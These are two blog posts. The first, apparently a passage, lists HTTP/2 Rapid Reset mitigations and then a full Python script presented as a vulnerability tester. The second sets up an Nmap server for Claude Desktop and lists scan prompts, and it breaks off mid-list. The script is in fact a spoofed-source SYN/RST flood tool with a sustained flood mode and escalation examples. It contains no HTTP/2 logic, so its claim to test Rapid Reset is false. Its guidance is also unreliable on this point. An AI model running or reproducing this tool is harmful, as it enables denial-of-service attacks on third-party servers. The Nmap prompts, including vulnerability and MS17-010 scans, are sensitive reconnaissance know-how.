Web Servers:

  • Nginx 1.25.2+ or 1.24.1+
  • Apache HTTP Server 2.4.58+
  • Caddy 2.7.4+
  • LiteSpeed 6.0.12+

Reverse Proxies and Load Balancers:

  • HAProxy 2.8.2+ or 2.6.15+
  • Envoy 1.27.0+
  • Traefik 2.10.5+

CDN and Cloud Services:

  • CloudFlare (auto patched August 2023)
  • AWS ALB/CloudFront (patched)
  • Azure Front Door (patched)
  • Google Cloud Load Balancer (patched)

Application Servers:

  • Tomcat 10.1.13+, 9.0.80+
  • Jetty 12.0.1+, 11.0.16+, 10.0.16+
  • Node.js 20.8.0+, 18.18.0+

2. Implement Stream Limits

Configure strict limits on HTTP/2 stream behavior:

# Nginx configuration
http2_max_concurrent_streams 128;
http2_recv_timeout 10s;
# Apache HTTP Server
H2MaxSessionStreams 100
H2StreamTimeout 10
# HAProxy configuration
defaults
    timeout http-request 10s
    timeout http-keep-alive 10s

frontend https-in
    option http-use-htx
    http-request track-sc0 src
    http-request deny if { sc_http_req_rate(0) gt 100 }

3. Deploy Rate Limiting

Implement multi layered rate limiting:

Connection level limits:

limit_conn_zone $binary_remote_addr zone=addr:10m;
limit_conn addr 10;  # Max 10 concurrent connections per IP

Request level limits:

limit_req_zone $binary_remote_addr zone=req_limit:10m rate=50r/s;
limit_req zone=req_limit burst=20 nodelay;

Stream cancellation tracking:

# Newer Nginx versions track RST_STREAM rates
http2_max_concurrent_streams 100;
http2_max_field_size 16k;
http2_max_header_size 32k;

4. Infrastructure Level Protections

Use a WAF or DDoS Protection Service:

  • CloudFlare (includes Rapid Reset protection)
  • AWS Shield Advanced
  • Azure DDoS Protection Standard
  • Imperva/Akamai

Enable Connection Draining:

# Gracefully handle connection resets
http2_recv_buffer_size 256k;
keepalive_timeout 60s;
keepalive_requests 100;

5. Monitoring and Alerting

Track critical metrics:

  • HTTP/2 stream reset rates
  • Concurrent stream counts per connection
  • Request cancellation patterns
  • CPU and memory usage spikes
  • Unusual traffic patterns from specific IPs

Example Prometheus query:

rate(nginx_http_requests_total{status="499"}[5m]) > 100

6. Consider HTTP/2 Disabling (Temporary Measure)

If you cannot immediately patch:

# Nginx: Disable HTTP/2 temporarily
listen 443 ssl;  # Remove http2 parameter
# Apache: Disable HTTP/2 module
# a2dismod http2

Note: This reduces performance benefits but eliminates the vulnerability.

Testing Script for HTTP/2 Rapid Reset Vulnerabilities on macOS

Below is a parameterized Python script that tests your web servers using hping3 for packet crafting. This script is specifically optimized for macOS and can spoof source IP addresses from a CIDR block to simulate distributed attacks. Using hping3 ensures IP spoofing works consistently across different network environments.

Prerequisites for macOS

Installation Steps:

# Install Homebrew (if not already installed)
/bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)"

# Install hping3
brew install hping

Note: This script requires root/sudo privileges for packet crafting and IP spoofing.

The Testing Script

cat > http2rapidresettester_macos.py << 'EOF'

#!/usr/bin/env python3
"""
HTTP/2 Rapid Reset Vulnerability Tester for macOS
Tests web servers for susceptibility to CVE-2023-44487
Uses hping3 for packet crafting with source IP spoofing from CIDR block

Usage:
    sudo python3 http2rapidresettester_macos.py --host example.com --port 443 --cidr 192.168.1.0/24 --packets 1000

Requirements:
    brew install hping
"""

import argparse
import subprocess
import random
import ipaddress
import time
import sys
import os
import platform
from typing import List, Optional

class HTTP2RapidResetTester:
    def __init__(
        self,
        host: str,
        port: int = 443,
        cidr_block: str = None,
        timeout: int = 30,
        verbose: bool = False,
        interface: str = None
    ):
        self.host = host
        self.port = port
        self.cidr_block = cidr_block
        self.timeout = timeout
        self.verbose = verbose
        self.interface = interface
        self.source_ips: List[str] = []

        # Verify running on macOS
        if platform.system() != 'Darwin':
            print("WARNING: This script is optimized for macOS")

        if not self.check_hping3():
            raise RuntimeError("hping3 is not installed. Install with: brew install hping")

        if not self.check_root():
            raise RuntimeError("This script requires root privileges (use sudo)")

        if cidr_block:
            self.generate_source_ips()
            
        if interface:
            self.verify_interface()

    def check_hping3(self) -> bool:
        """Check if hping3 is installed"""
        try:
            result = subprocess.run(
                ['which', 'hping3'],
                capture_output=True,
                text=True,
                timeout=5
            )
            if result.returncode == 0:
                return True

            # Try alternative hping command
            result = subprocess.run(
                ['which', 'hping'],
                capture_output=True,
                text=True,
                timeout=5
            )
            return result.returncode == 0
        except Exception as e:
            print(f"Error checking for hping3: {e}")
            return False

    def check_root(self) -> bool:
        """Check if running with root privileges"""
        return os.geteuid() == 0

    def verify_interface(self):
        """Verify that the specified network interface exists"""
        try:
            result = subprocess.run(
                ['ifconfig', self.interface],
                capture_output=True,
                text=True,
                timeout=5
            )
            if result.returncode != 0:
                raise RuntimeError(f"Network interface '{self.interface}' not found")
            
            if self.verbose:
                print(f"Using network interface: {self.interface}")
                
        except subprocess.TimeoutExpired:
            raise RuntimeError(f"Timeout verifying interface '{self.interface}'")
        except FileNotFoundError:
            raise RuntimeError("ifconfig command not found")

    def generate_source_ips(self):
        """Generate list of IP addresses from CIDR block"""
        try:
            network = ipaddress.ip_network(self.cidr_block, strict=False)
            self.source_ips = [str(ip) for ip in network.hosts()]

            if len(self.source_ips) == 0:
                # Handle /32 or /31 networks
                self.source_ips = [str(ip) for ip in network]

            print(f"Generated {len(self.source_ips)} source IPs from {self.cidr_block}")

        except ValueError as e:
            print(f"Invalid CIDR block: {e}")
            sys.exit(1)

    def get_random_source_ip(self) -> Optional[str]:
        """Get a random IP address from the CIDR block"""
        if not self.source_ips:
            return None
        return random.choice(self.source_ips)

    def get_hping_command(self) -> str:
        """Determine which hping command is available"""
        result = subprocess.run(['which', 'hping3'], capture_output=True, text=True)
        if result.returncode == 0:
            return 'hping3'
        return 'hping'

    def craft_syn_packet(self, source_ip: str, count: int = 1) -> bool:
        """
        Craft TCP SYN packet using hping3

        Args:
            source_ip: Source IP address to spoof
            count: Number of packets to send

        Returns:
            True if successful, False otherwise
        """
        try:
            hping_cmd = self.get_hping_command()
            cmd = [
                hping_cmd,
                '-S',  # SYN flag
                '-p', str(self.port),  # Destination port
                '-c', str(count),  # Packet count
                '--fast',  # Send packets as fast as possible
            ]

            if source_ip:
                cmd.extend(['-a', source_ip])  # Spoof source IP

            if self.interface:
                cmd.extend(['-I', self.interface])  # Specify network interface

            cmd.append(self.host)

            if self.verbose:
                print(f"Executing: {' '.join(cmd)}")

            result = subprocess.run(
                cmd,
                capture_output=True,
                text=True,
                timeout=self.timeout
            )

            return result.returncode == 0

        except subprocess.TimeoutExpired:
            if self.verbose:
                print(f"Timeout executing hping3 for {source_ip}")
            return False
        except Exception as e:
            if self.verbose:
                print(f"Error crafting SYN packet: {e}")
            return False

    def craft_rst_packet(self, source_ip: str, count: int = 1) -> bool:
        """
        Craft TCP RST packet using hping3

        Args:
            source_ip: Source IP address to spoof
            count: Number of packets to send

        Returns:
            True if successful, False otherwise
        """
        try:
            hping_cmd = self.get_hping_command()
            cmd = [
                hping_cmd,
                '-R',  # RST flag
                '-p', str(self.port),  # Destination port
                '-c', str(count),  # Packet count
                '--fast',  # Send packets as fast as possible
            ]

            if source_ip:
                cmd.extend(['-a', source_ip])  # Spoof source IP

            if self.interface:
                cmd.extend(['-I', self.interface])  # Specify network interface

            cmd.append(self.host)

            if self.verbose:
                print(f"Executing: {' '.join(cmd)}")

            result = subprocess.run(
                cmd,
                capture_output=True,
                text=True,
                timeout=self.timeout
            )

            return result.returncode == 0

        except subprocess.TimeoutExpired:
            if self.verbose:
                print(f"Timeout executing hping3 for {source_ip}")
            return False
        except Exception as e:
            if self.verbose:
                print(f"Error crafting RST packet: {e}")
            return False

    def rapid_reset_test(
        self,
        num_packets: int,
        packets_per_ip: int = 10,
        reset_ratio: float = 1.0,
        delay_between_bursts: float = 0.01
    ) -> dict:
        """
        Perform rapid reset attack simulation

        Args:
            num_packets: Total number of packets to send
            packets_per_ip: Number of packets per source IP before switching
            reset_ratio: Ratio of RST packets to SYN packets (1.0 = equal)
            delay_between_bursts: Delay between packet bursts in seconds

        Returns:
            Dictionary with test results
        """
        results = {
            'total_packets': 0,
            'syn_packets': 0,
            'rst_packets': 0,
            'unique_source_ips': 0,
            'failed_packets': 0,
            'start_time': time.time(),
            'end_time': None
        }

        print(f"\nStarting HTTP/2 Rapid Reset test:")
        print(f"   Total packets: {num_packets}")
        print(f"   Packets per source IP: {packets_per_ip}")
        print(f"   RST to SYN ratio: {reset_ratio}")
        print(f"   Target: {self.host}:{self.port}")
        if self.cidr_block:
            print(f"   Source CIDR: {self.cidr_block}")
            print(f"   Available source IPs: {len(self.source_ips)}")
        if self.interface:
            print(f"   Network interface: {self.interface}")
        print("=" * 60)

        used_ips = set()
        packets_sent = 0
        current_ip_packets = 0
        current_source_ip = self.get_random_source_ip()

        if current_source_ip:
            used_ips.add(current_source_ip)

        try:
            while packets_sent < num_packets:
                # Switch to new source IP if needed
                if current_ip_packets >= packets_per_ip and self.source_ips:
                    current_source_ip = self.get_random_source_ip()
                    used_ips.add(current_source_ip)
                    current_ip_packets = 0

                # Send SYN packet
                if self.craft_syn_packet(current_source_ip, count=1):
                    results['syn_packets'] += 1
                    results['total_packets'] += 1
                    packets_sent += 1
                    current_ip_packets += 1
                else:
                    results['failed_packets'] += 1

                # Send RST packet based on ratio
                if random.random() < reset_ratio:
                    if self.craft_rst_packet(current_source_ip, count=1):
                        results['rst_packets'] += 1
                        results['total_packets'] += 1
                        packets_sent += 1
                        current_ip_packets += 1
                    else:
                        results['failed_packets'] += 1

                # Progress indicator
                if packets_sent % 100 == 0:
                    elapsed = time.time() - results['start_time']
                    rate = packets_sent / elapsed if elapsed > 0 else 0
                    print(f"Progress: {packets_sent}/{num_packets} packets "
                          f"({rate:.0f} pps) | "
                          f"Unique IPs: {len(used_ips)}")

                # Small delay between bursts
                if delay_between_bursts > 0:
                    time.sleep(delay_between_bursts)

        except KeyboardInterrupt:
            print("\nTest interrupted by user")
        except Exception as e:
            print(f"\nTest error: {e}")

        results['end_time'] = time.time()
        results['unique_source_ips'] = len(used_ips)

        return results

    def flood_mode(
        self,
        duration: int = 60,
        packet_rate: int = 1000
    ) -> dict:
        """
        Perform continuous flood attack for specified duration

        Args:
            duration: Duration of the flood in seconds
            packet_rate: Target packet rate per second

        Returns:
            Dictionary with test results
        """
        results = {
            'total_packets': 0,
            'syn_packets': 0,
            'rst_packets': 0,
            'unique_source_ips': 0,
            'failed_packets': 0,
            'start_time': time.time(),
            'end_time': None,
            'duration': duration
        }

        print(f"\nStarting flood mode:")
        print(f"   Duration: {duration} seconds")
        print(f"   Target rate: {packet_rate} packets/second")
        print(f"   Target: {self.host}:{self.port}")
        if self.cidr_block:
            print(f"   Source CIDR: {self.cidr_block}")
        if self.interface:
            print(f"   Network interface: {self.interface}")
        print("=" * 60)

        end_time = time.time() + duration
        used_ips = set()

        try:
            while time.time() < end_time:
                batch_start = time.time()

                # Send batch of packets
                for _ in range(packet_rate // 10):  # Batch in 0.1s intervals
                    source_ip = self.get_random_source_ip()
                    if source_ip:
                        used_ips.add(source_ip)

                    # Send SYN
                    if self.craft_syn_packet(source_ip, count=1):
                        results['syn_packets'] += 1
                        results['total_packets'] += 1
                    else:
                        results['failed_packets'] += 1

                    # Send RST
                    if self.craft_rst_packet(source_ip, count=1):
                        results['rst_packets'] += 1
                        results['total_packets'] += 1
                    else:
                        results['failed_packets'] += 1

                # Rate limiting
                batch_duration = time.time() - batch_start
                sleep_time = 0.1 - batch_duration
                if sleep_time > 0:
                    time.sleep(sleep_time)

                # Progress update
                elapsed = time.time() - results['start_time']
                remaining = end_time - time.time()
                rate = results['total_packets'] / elapsed if elapsed > 0 else 0

                print(f"Elapsed: {elapsed:.1f}s | Remaining: {remaining:.1f}s | "
                      f"Rate: {rate:.0f} pps | Total: {results['total_packets']}")

        except KeyboardInterrupt:
            print("\nFlood interrupted by user")
        except Exception as e:
            print(f"\nFlood error: {e}")

        results['end_time'] = time.time()
        results['unique_source_ips'] = len(used_ips)

        return results

    def display_results(self, results: dict):
        """Display test results in a readable format"""
        duration = results['end_time'] - results['start_time']

        print("\n" + "=" * 60)
        print("TEST RESULTS")
        print("=" * 60)
        print(f"Total packets sent:      {results['total_packets']}")
        print(f"SYN packets:             {results['syn_packets']}")
        print(f"RST packets:             {results['rst_packets']}")
        print(f"Failed packets:          {results['failed_packets']}")
        print(f"Unique source IPs used:  {results['unique_source_ips']}")
        print(f"Test duration:           {duration:.2f}s")

        if duration > 0:
            rate = results['total_packets'] / duration
            print(f"Average packet rate:     {rate:.0f} packets/second")

        print("\n" + "=" * 60)
        print("ASSESSMENT")
        print("=" * 60)

        if results['failed_packets'] > results['total_packets'] * 0.5:
            print("WARNING: High failure rate detected")
            print("  Check network connectivity and firewall rules")
        elif results['total_packets'] > 0:
            print("Test completed successfully")
            print("  Monitor target server for:")
            print("    Connection state table exhaustion")
            print("    CPU/memory utilization spikes")
            print("    Application performance degradation")

        print("=" * 60 + "\n")

def main():
    parser = argparse.ArgumentParser(
        description='Test web servers for HTTP/2 Rapid Reset vulnerability (macOS version)',
        formatter_class=argparse.RawDescriptionHelpFormatter,
        epilog="""
Examples:
  # Basic test with CIDR block
  sudo python3 http2rapidresettester_macos.py --host example.com --cidr 192.168.1.0/24 --packets 1000

  # Specify network interface
  sudo python3 http2rapidresettester_macos.py --host example.com --cidr 192.168.1.0/24 --interface en0 --packets 1000

  # Flood mode for 60 seconds
  sudo python3 http2rapidresettester_macos.py --host example.com --cidr 10.0.0.0/16 --flood --duration 60

  # High intensity test with specific interface
  sudo python3 http2rapidresettester_macos.py --host example.com --cidr 172.16.0.0/12 --interface en1 --packets 10000 --packetsperip 50

  # Test without IP spoofing
  sudo python3 http2rapidresettester_macos.py --host example.com --packets 1000

Prerequisites:
  1. Install hping3: brew install hping
  2. Run with sudo for raw socket access
  3. Check available interfaces: ifconfig

Note: IP spoofing works reliably with hping3 across different network environments.
        """
    )

    # Connection parameters
    parser.add_argument('--host', required=True, help='Target hostname or IP address')
    parser.add_argument('--port', type=int, default=443, help='Target port (default: 443)')
    parser.add_argument('--cidr', help='CIDR block for source IP spoofing (e.g., 192.168.1.0/24)')
    parser.add_argument('--interface', help='Network interface to use (e.g., en0, en1). Optional.')
    parser.add_argument('--timeout', type=int, default=30, help='Command timeout in seconds (default: 30)')

    # Test mode parameters
    parser.add_argument('--flood', action='store_true', help='Enable flood mode (continuous attack)')
    parser.add_argument('--duration', type=int, default=60, help='Duration for flood mode in seconds (default: 60)')
    parser.add_argument('--packetrate', type=int, default=1000, help='Target packet rate for flood mode (default: 1000)')

    # Normal mode parameters
    parser.add_argument('--packets', type=int, default=1000,
                       help='Total number of packets to send (default: 1000)')
    parser.add_argument('--packetsperip', type=int, default=10,
                       help='Number of packets per source IP before switching (default: 10)')
    parser.add_argument('--resetratio', type=float, default=1.0,
                       help='Ratio of RST to SYN packets (default: 1.0)')
    parser.add_argument('--burstdelay', type=float, default=0.01,
                       help='Delay between packet bursts in seconds (default: 0.01)')

    # Other options
    parser.add_argument('--verbose', action='store_true', help='Enable verbose output')

    args = parser.parse_args()

    # Print header
    print("=" * 60)
    print("HTTP/2 Rapid Reset Vulnerability Tester for macOS")
    print("CVE-2023-44487")
    print("Using hping3 for packet crafting")
    print("=" * 60)
    print(f"Target: {args.host}:{args.port}")
    if args.cidr:
        print(f"Source CIDR: {args.cidr}")
    else:
        print("Source IP: Local IP (no spoofing)")
    if args.interface:
        print(f"Interface: {args.interface}")
    print("=" * 60)

    # Create tester instance
    try:
        tester = HTTP2RapidResetTester(
            host=args.host,
            port=args.port,
            cidr_block=args.cidr,
            timeout=args.timeout,
            verbose=args.verbose,
            interface=args.interface
        )
    except RuntimeError as e:
        print(f"ERROR: {e}")
        sys.exit(1)

    try:
        if args.flood:
            # Run flood mode
            results = tester.flood_mode(
                duration=args.duration,
                packet_rate=args.packetrate
            )
        else:
            # Run normal rapid reset test
            results = tester.rapid_reset_test(
                num_packets=args.packets,
                packets_per_ip=args.packetsperip,
                reset_ratio=args.resetratio,
                delay_between_bursts=args.burstdelay
            )

        # Display results
        tester.display_results(results)

    except KeyboardInterrupt:
        print("\nTest interrupted by user")
        sys.exit(0)
    except Exception as e:
        print(f"\nFatal error: {e}")
        import traceback
        if args.verbose:
            traceback.print_exc()
        sys.exit(1)

if __name__ == '__main__':
    main()
EOF
chmod +x http2rapidresettester_macos.py

Using the Testing Script on macOS

Summary of usage:

# Use specific interface
sudo python3 http2rapidresettester_macos.py --host example.com --cidr 192.168.1.0/24 --interface en0 --packets 1000

# Use WiFi interface (typically en0 on MacBooks)
sudo python3 http2rapidresettester_macos.py --host example.com --interface en0 --packets 500

# Use Ethernet interface
sudo python3 http2rapidresettester_macos.py --host example.com --interface en1 --cidr 10.0.0.0/16 --flood --duration 30

# Without interface (uses default routing)
sudo python3 http2rapidresettester_macos.py --host example.com --packets 1000

Test your server with CIDR block spoofing:

sudo python3 http2rapidresettester_macos.py --host example.com --cidr 192.168.1.0/24 --packets 1000

Advanced Examples

High intensity test (use cautiously in test environments):

sudo python3 http2rapidresettester_macos.py \
    --host staging.example.com \
    --cidr 10.0.0.0/16 \
    --packets 5000 \
    --packetsperip 50

Flood mode for sustained testing:

sudo python3 http2rapidresettester_macos.py \
    --host test.example.com \
    --cidr 172.16.0.0/12 \
    --flood \
    --duration 60 \
    --packetrate 500

Test without IP spoofing:

sudo python3 http2rapidresettester_macos.py \
    --host example.com \
    --packets 1000

Verbose mode for debugging:

sudo python3 http2rapidresettester_macos.py \
    --host example.com \
    --cidr 192.168.1.0/24 \
    --packets 100 \
    --verbose

Gradual escalation test (start small, increase if needed):

# Start with 50 packets
sudo python3 http2rapidresettester_macos.py --host example.com --cidr 192.168.1.0/24 --packets 50

# If server handles it well, increase
sudo python3 http2rapidresettester_macos.py --host example.com --cidr 192.168.1.0/24 --packets 200

# Final aggressive test
sudo python3 http2rapidresettester_macos.py --host example.com --cidr 192.168.1.0/24 --packets 1000

Interpreting Results

The script outputs packet statistics including:

  • Total packets sent (SYN and RST combined)
  • Number of SYN packets
  • Number of RST packets
  • Failed packet count
  • Number of unique source IPs used
  • Average packet rate
  • Test duration

What to Monitor

Monitor your target server for:

  • Connection state table exhaustion: Check netstat or ss output for connection counts
  • CPU and memory utilization spikes: Use Activity Monitor or top command
  • Application performance degradation: Monitor response times and error rates
  • Firewall or rate limiting triggers: Check firewall logs and rate limiting counters

Protected Server Indicators

  • High failure rate in the test results
  • Server actively blocking or rate limiting connections
  • Firewall rules triggering during test
  • Connection resets from the server

Vulnerable Server Indicators

  • All packets successfully sent with low failure rate
  • No rate limiting or blocking observed
  • Server continues processing all requests
  • Resource utilization climbs steadily

Why hping3 for macOS?

Using hping3 provides several advantages for macOS users:

Universal IP Spoofing Support

  • Consistent behavior: hping3 provides reliable IP spoofing across different network configurations
  • Proven tool: Industry standard for packet crafting and network testing
  • Better compatibility: Works with most network interfaces and routing configurations

macOS Specific Benefits

  • Native support: Works well with macOS network stack
  • Firewall compatibility: Better integration with macOS firewall
  • Performance: Efficient packet generation on macOS

Reliability Advantages

  • Mature codebase: hping3 has been battle tested for decades
  • Active community: Well documented with extensive community support
  • Cross platform: Same tool works on Linux, BSD, and macOS

macOS Installation and Setup

Installing hping3

# Using Homebrew (recommended)
brew install hping

# Verify installation
which hping3
hping3 --version

Firewall Configuration

macOS firewall may need configuration for raw packet injection:

  1. Open System Preferences > Security & Privacy > Firewall
  2. Click “Firewall Options”
  3. Add Python to allowed applications
  4. Grant network access when prompted

Alternatively, for testing environments:

# Temporarily disable firewall (not recommended for production)
sudo /usr/libexec/ApplicationFirewall/socketfilterfw --setglobalstate off

# Re-enable after testing
sudo /usr/libexec/ApplicationFirewall/socketfilterfw --setglobalstate on

Network Interfaces

List available network interfaces:

ifconfig

Common macOS interfaces:

  • en0: Primary Ethernet/WiFi
  • en1: Secondary network interface
  • lo0: Loopback interface
  • bridge0: Bridged interface (if using virtualization)

Best Practices for Testing

  1. Start with staging/test environments: Never run aggressive tests against production without authorization
  2. Coordinate with your team: Inform security and operations teams before testing
  3. Monitor server metrics: Watch CPU, memory, and connection counts during tests
  4. Test during low traffic periods: Minimize impact on real users if testing production
  5. Gradual escalation: Start with conservative parameters and increase gradually
  6. Document results: Keep records of test results and any configuration changes
  7. Have rollback plans: Be prepared to quickly disable testing if issues arise

Troubleshooting on macOS

Error: “hping3 is not installed”

Install hping3 using Homebrew:

brew install hping

Error: “Operation not permitted”

Make sure you are running with sudo:

sudo python3 http2rapidresettester_macos.py [options]

Error: “No route to host”

Check your network connectivity:

ping example.com
traceroute example.com

Verify your network interface is up:

ifconfig en0

Packets Not Being Sent

Possible causes and solutions:

  1. Firewall blocking: Temporarily disable firewall or add exception
  2. Interface not active: Check ifconfig output
  3. Permission issues: Ensure running with sudo
  4. Wrong interface: Specify interface with hping3 using i flag

Low Packet Rate

Performance optimization tips:

  • Use wired Ethernet instead of WiFi
  • Close other network intensive applications
  • Reduce packet rate target with --packetrate
  • Use smaller CIDR blocks

Monitoring Your Tests

Using tcpdump

Monitor packets in real time:

# Watch SYN packets
sudo tcpdump -i en0 'tcp[tcpflags] & tcp-syn != 0' -n

# Watch RST packets
sudo tcpdump -i en0 'tcp[tcpflags] & tcp-rst != 0' -n

# Watch specific host and port
sudo tcpdump -i en0 host example.com and port 443 -n

# Save to file for later analysis
sudo tcpdump -i en0 -w test_capture.pcap host example.com

Using Wireshark

For detailed packet analysis:

# Install Wireshark
brew install --cask wireshark

# Run Wireshark
sudo wireshark

# Or use tshark for command line
tshark -i en0 -f "host example.com"

Activity Monitor

Monitor system resources during testing:

  1. Open Activity Monitor (Applications > Utilities > Activity Monitor)
  2. Select “Network” tab
  3. Watch “Packets in” and “Packets out”
  4. Monitor “Data sent/received”
  5. Check CPU usage of Python process

Server Side Monitoring

On your target server, monitor:

# Connection states
netstat -an | grep :443 | awk '{print $6}' | sort | uniq -c

# Active connections count
netstat -an | grep ESTABLISHED | wc -l

# SYN_RECV connections
netstat -an | grep SYN_RECV | wc -l

# System resources
top -l 1 | head -10

Understanding IP Spoofing with hping3

How It Works

hping3 creates raw packets at the network layer, allowing you to specify arbitrary source IP addresses. This bypasses normal TCP/IP stack restrictions.

Network Requirements

For IP spoofing to work effectively:

  • Local networks: Works best on LANs you control
  • Direct routing: Requires direct layer 2 access
  • No NAT interference: NAT devices may rewrite source addresses
  • Router configuration: Some routers filter spoofed packets (BCP 38)

Testing Without Spoofing

If IP spoofing is not working in your environment:

# Test without CIDR block
sudo python3 http2rapidresettester_macos.py --host example.com --packets 1000

# This still validates:
# - Rate limiting configuration
# - Stream management
# - Server resilience
# - Resource consumption patterns

Advanced Configuration Options

Custom Packet Timing

# Slower, more stealthy testing
sudo python3 http2rapidresettester_macos.py \
    --host example.com \
    --packets 500 \
    --burstdelay 0.1  # 100ms between bursts

# Faster, more aggressive
sudo python3 http2rapidresettester_macos.py \
    --host example.com \
    --packets 1000 \
    --burstdelay 0.001  # 1ms between bursts

Custom RST to SYN Ratio

# More SYN packets (mimics connection attempts)
sudo python3 http2rapidresettester_macos.py \
    --host example.com \
    --packets 1000 \
    --resetratio 0.3  # 1 RST for every 3 SYN

# Equal SYN and RST (classic rapid reset)
sudo python3 http2rapidresettester_macos.py \
    --host example.com \
    --packets 1000 \
    --resetratio 1.0

Targeting Different Ports

# Test HTTPS (port 443)
sudo python3 http2rapidresettester_macos.py --host example.com --port 443

# Test HTTP/2 on custom port
sudo python3 http2rapidresettester_macos.py --host example.com --port 8443

# Test load balancer
sudo python3 http2rapidresettester_macos.py --host lb.example.com --port 443

Understanding the Attack Surface

When testing your infrastructure:

  1. Test all HTTP/2 endpoints: Web servers, load balancers, API gateways
  2. Verify CDN protection: Test both origin and CDN endpoints
  3. Test direct vs proxied: Compare protection at different layers
  4. Validate rate limiting: Ensure limits trigger at expected thresholds
  5. Confirm monitoring: Verify alerts trigger correctly

Conclusion

The HTTP/2 Rapid Reset vulnerability represents a significant threat to web infrastructure, but with proper patching, configuration, and monitoring, you can effectively protect your systems. This macOS optimized testing script using hping3 allows you to validate your defenses in a controlled manner with reliable IP spoofing capabilities across different network environments.

Remember that security is an ongoing process. Regularly:

  • Update your web server and proxy software
  • Review and adjust HTTP/2 configuration limits
  • Monitor for unusual traffic patterns
  • Test your defenses against emerging threats

By staying vigilant and proactive, you can maintain a resilient web presence capable of withstanding sophisticated DDoS attacks.

Additional Resources


This blog post and testing script are provided for educational and defensive security purposes only. Always obtain proper authorization before testing systems you do not own.

0
0

MacOs: Deep Dive into NMAP using Claude Desktop with an NMAP MCP

Introduction

NMAP (Network Mapper) is one of the most powerful and versatile network scanning tools available for security professionals, system administrators, and ethical hackers. When combined with Claude through the Model Context Protocol (MCP), it becomes an even more powerful tool, allowing you to leverage AI to intelligently analyze scan results, suggest scanning strategies, and interpret complex network data.

In this deep dive, we’ll explore how to set up NMAP with Claude Desktop using an MCP server, and demonstrate 20+ comprehensive vulnerability checks and reconnaissance techniques you can perform using natural language prompts.

Legal Disclaimer: Only scan systems and networks you own or have explicit written permission to test. Unauthorized scanning may be illegal in your jurisdiction.

Prerequisites

  • macOS, Linux, or Windows with WSL
  • Basic understanding of networking concepts
  • Permission to scan target systems
  • Claude Desktop installed

Part 1: Installation and Setup

Step 1: Install NMAP

On macOS:

# Using Homebrew
brew install nmap

# Verify installation

On Linux (Ubuntu/Debian):

Step 2: Install Node.js (Required for MCP Server)

The NMAP MCP server requires Node.js to run.

Mac OS:

brew install node
node --version
npm --version

Step 3: Install the NMAP MCP Server

The most popular NMAP MCP server is available on GitHub. We’ll install it globally:

cd ~/
rm -rf nmap-mcp-server
git clone https://github.com/PhialsBasement/nmap-mcp-server.git
cd nmap-mcp-server
npm install
npm run build

Step 4: Configure Claude Desktop

Edit the Claude Desktop configuration file to add the NMAP MCP server.

On macOS:

CONFIG_FILE="$HOME/Library/Application Support/Claude/claude_desktop_config.json"
USERNAME=$(whoami)

cp "$CONFIG_FILE" "$CONFIG_FILE.backup"

python3 << 'EOF'
import json
import os

config_file = os.path.expanduser("~/Library/Application Support/Claude/claude_desktop_config.json")
username = os.environ['USER']

with open(config_file, 'r') as f:
config = json.load(f)

if 'mcpServers' not in config:
config['mcpServers'] = {}

config['mcpServers']['nmap'] = {
"command": "node",
"args": [
f"/Users/{username}/nmap-mcp-server/dist/index.js"
],
"env": {}
}

with open(config_file, 'w') as f:
json.dump(config, f, indent=2)

print("nmap server added to Claude Desktop config!")
print(f"Backup saved to: {config_file}.backup")
EOF


Step 5: Restart Claude Desktop

Close and reopen Claude Desktop. You should see the NMAP MCP server connected in the bottom-left corner.

Part 2: Understanding NMAP MCP Capabilities

Once configured, Claude can execute NMAP scans through the MCP server. The server typically provides:

  • Host discovery scans
  • Port scanning (TCP/UDP)
  • Service version detection
  • OS detection
  • Script scanning (NSE – NMAP Scripting Engine)
  • Output parsing and interpretation

Part 3: 20 Most Common Vulnerability Checks

For these examples, we’ll use a hypothetical target domain: example-target.com (replace with your authorized target).

1. Basic Host Discovery and Open Ports

Prompt:

Scan example-target.com to discover if the host is up and identify all open ports (1-1000). Use a TCP SYN scan for speed.

What this does: Performs a fast SYN scan on the first 1000 ports to quickly identify open services.

Expected NMAP command:

nmap -sS -p 1-1000 example-target.com

2. Comprehensive Port Scan (All 65535 Ports)

Prompt:

Perform a comprehensive scan of all 65535 TCP ports on example-target.com to identify any services running on non-standard ports.

What this does: Scans every possible TCP port – time-consuming but thorough.

Expected NMAP command:

nmap -p- example-target.com

3. Service Version Detection

Prompt:

Scan the top 1000 ports on example-target.com and detect the exact versions of services running on open ports. This will help identify outdated software.

What this does: Probes open ports to determine service/version info, crucial for finding known vulnerabilities.

Expected NMAP command:

nmap -sV example-target.com

4. Operating System Detection

Prompt:

Detect the operating system running on example-target.com using TCP/IP stack fingerprinting. Include OS detection confidence levels.

What this does: Analyzes network responses to guess the target OS.

Expected NMAP command:

nmap -O example-target.com

5. Aggressive Scan (OS + Version + Scripts + Traceroute)

Prompt:

Run an aggressive scan on example-target.com that includes OS detection, version detection, script scanning, and traceroute. This is comprehensive but noisy.

What this does: Combines multiple detection techniques for maximum information.

Expected NMAP command:

nmap -A example-target.com

6. Vulnerability Scanning with NSE Scripts

Prompt:

Scan example-target.com using NMAP's vulnerability detection scripts to check for known CVEs and security issues in running services.

What this does: Uses NSE scripts from the ‘vuln’ category to detect known vulnerabilities.

Expected NMAP command:

nmap --script vuln example-target.com

7. SSL/TLS Security Analysis

Prompt:

Analyze SSL/TLS configuration on example-target.com (port 443). Check for weak ciphers, certificate issues, and SSL vulnerabilities like Heartbleed and POODLE.

What this does: Comprehensive SSL/TLS security assessment.

Expected NMAP command:

nmap -p 443 --script ssl-enum-ciphers,ssl-cert,ssl-heartbleed,ssl-poodle example-target.com

8. HTTP Security Headers and Vulnerabilities

Prompt:

Check example-target.com's web server (ports 80, 443, 8080) for security headers, common web vulnerabilities, and HTTP methods allowed.

What this does: Tests for missing security headers, dangerous HTTP methods, and common web flaws.

Expected NMAP command:

nmap -p 80,443,8080 --script http-security-headers,http-methods,http-csrf,http-stored-xss example-target.com

Prompt:

Scan example-target.com for SMB vulnerabilities including MS17-010 (EternalBlue), SMB signing issues, and accessible shares.

What this does: Critical for identifying Windows systems vulnerable to ransomware exploits.

Expected NMAP command:

nmap -p 445 --script smb-vuln-ms17-010,smb-vuln-*,smb-enum-shares example-target.com

10. SQL Injection Testing

Prompt:

Test web applications on example-target.com (ports 80, 443) for SQL injection vulnerabilities in common web paths and parameters.

What this does: Identifies potential SQL injection points.

Expected NMAP command:

nmap -p 80,443 --script http-sql-injection example-target.com

11. DNS Zone Transfer Vulnerability

Prompt:

